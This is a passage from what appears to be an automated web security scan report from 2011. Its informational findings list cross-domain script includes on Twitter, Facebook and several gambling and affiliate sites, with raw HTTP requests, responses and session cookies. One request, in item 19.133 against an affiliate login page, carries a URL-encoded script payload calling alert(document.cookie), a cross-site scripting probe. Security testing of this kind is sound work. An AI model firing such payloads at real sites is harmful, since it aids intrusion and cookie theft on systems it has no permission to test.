Set-Cookie: guest_id=130554712445382826; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOYurPgvAToHaWQiJWFiMDRlMGMzNDNkYzhh%250AM2RlODFlOGM3MTY2MDI1ZDY2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b4682015a7f1885320edf06ef6f2b95fed508082; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346" type="text/javascript"></script>
...[SNIP]...

19.128. http://twitter.com/PrimeScratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PrimeScratch

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346
http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346
http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346
http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346
http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346
http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346
http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /PrimeScratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-38253-35739
ETag: "de9673ab5bac9a85dedd4caeafe3f4e2"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.00948
Content-Type: text/html; charset=utf-8
Content-Length: 48033
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 902d2adaaadcd4c50d07311d00ce36d2fb541db9
Set-Cookie: k=173.193.214.243.1305547124198035; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712420572627; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCO4trPgvAToHaWQiJWYxODc0MTk2MjM0Mjgw%250AZDhiYTA3NjMyOGM0NzNiN2M5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--fa86eb668ddb62cafcb9697b322fc64f12da4063; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346" type="text/javascript"></script>
...[SNIP]...

19.129. http://twitter.com/crazyscratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/crazyscratch

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346
http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346
http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346
http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346
http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346
http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346
http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /crazyscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-24586-58491
ETag: "d6f21384f100129309a8c66fccb1ac7d"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.00873
Content-Type: text/html; charset=utf-8
Content-Length: 47490
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e6ed5ddb8758b31406ef9cd22c304eb256d1c6ac
Set-Cookie: k=173.193.214.243.1305547124050568; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712405667445; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFotrPgvAToHaWQiJTAzZjUxZWIyNmM4ZGVi%250AMDllY2QyMDI3YjhmMWQ2M2JkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--593c1ebfebc2e5eb6e907ba040cf743ef29a279e; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346" type="text/javascript"></script>
...[SNIP]...

19.130. http://twitter.com/ukscratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ukscratch

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346
http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346
http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346
http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346
http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346
http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346
http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ukscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547123-20423-53593
ETag: "ab5f42b56a9a549a2367ddad1fefb082"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:43 GMT
X-Runtime: 0.00833
Content-Type: text/html; charset=utf-8
Content-Length: 23894
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 37f116a865ccfb3e22b1c38efd73db8ddb6854e5
Set-Cookie: k=173.193.214.243.1305547123976604; path=/; expires=Mon, 23-May-11 11:58:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712398340369; path=/; expires=Wed, 15 Jun 2011 11:58:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCBAtrPgvAToHaWQiJTA2ZmQ5MzM0MjQxNzI4%250ANWRmZTU4MGM2YzQ1ZjNiNWRjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a6c952001d0836b81d2cff483ca79969f1db4eaf; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346" type="text/javascript"></script>
...[SNIP]...

19.131. http://www.affiliatelounge.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.affiliatelounge.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: www.affiliatelounge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Sun, 15 May 2011 12:35:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 21563

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_HtmlElement" xmlns="http://www.w3.org/1999/xhtml" lang
...[SNIP]...
<link rel="icon" type="image/ico" href="favicon.ico" />
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

19.132. https://www.aspireaffiliates.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js

Request

GET / HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...

19.133. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

19.134. https://www.aspireaffiliates.com/marketing-samples/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/marketing-samples/

Issue detail

The response dynamically includes the following script from another domain:

https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js

Request

Response

19.135. https://www.aspireaffiliates.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/mobile/

Issue detail

The response dynamically includes the following script from another domain:

https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js

Request

Response

19.136. https://www.betsson.com/start/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/start/en/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/startpage/en/df_StartPageJavaScript_v19738.js

Request

GET /start/en/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.137. https://www.betsson.com/start/is/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/start/is/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/is/df_CoreFontLibrary_is_v5508.Js
https://ble.hs.llnwd.net/e1/betsson/is/df_CoreJavaScriptV2_v22587.js
https://ble.hs.llnwd.net/e1/betsson/is/df_CoreJsRoot_v23775.js
https://ble.hs.llnwd.net/e1/startpage/is/df_StartPageJavaScript_v7723.js

Request

GET /start/is/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:50 GMT
Connection: close
Content-Length: 39256
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/is/df_CoreJsRoot_v23775.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/startpage/is/df_StartPageJavaScript_v7723.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/is/df_CoreFontLibrary_is_v5508.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/is/df_CoreJavaScriptV2_v22587.js"></script>
...[SNIP]...

19.138. https://www.betsson.com/web/en/sportsbook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/web/en/sportsbook/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js

Request

GET /web/en/sportsbook/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 78630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hrdmunq10h1upatzji4snpvl; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 16 May 2011 12:08:59 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</ul>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.139. http://www.bigmoneyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

Response

19.140. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yL/r/LnZ1HDCjD4N.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.141. http://www.facebook.com/PrimeScratchCards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/PrimeScratchCards

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Cx2s6uhEG36.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.142. http://www.facebook.com/PrimeScratchCards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/PrimeScratchCards

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

Response

19.143. http://www.facebook.com/WinningsCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/WinningsCom

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Cx2s6uhEG36.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.144. http://www.facebook.com/crazyscratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crazyscratch

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
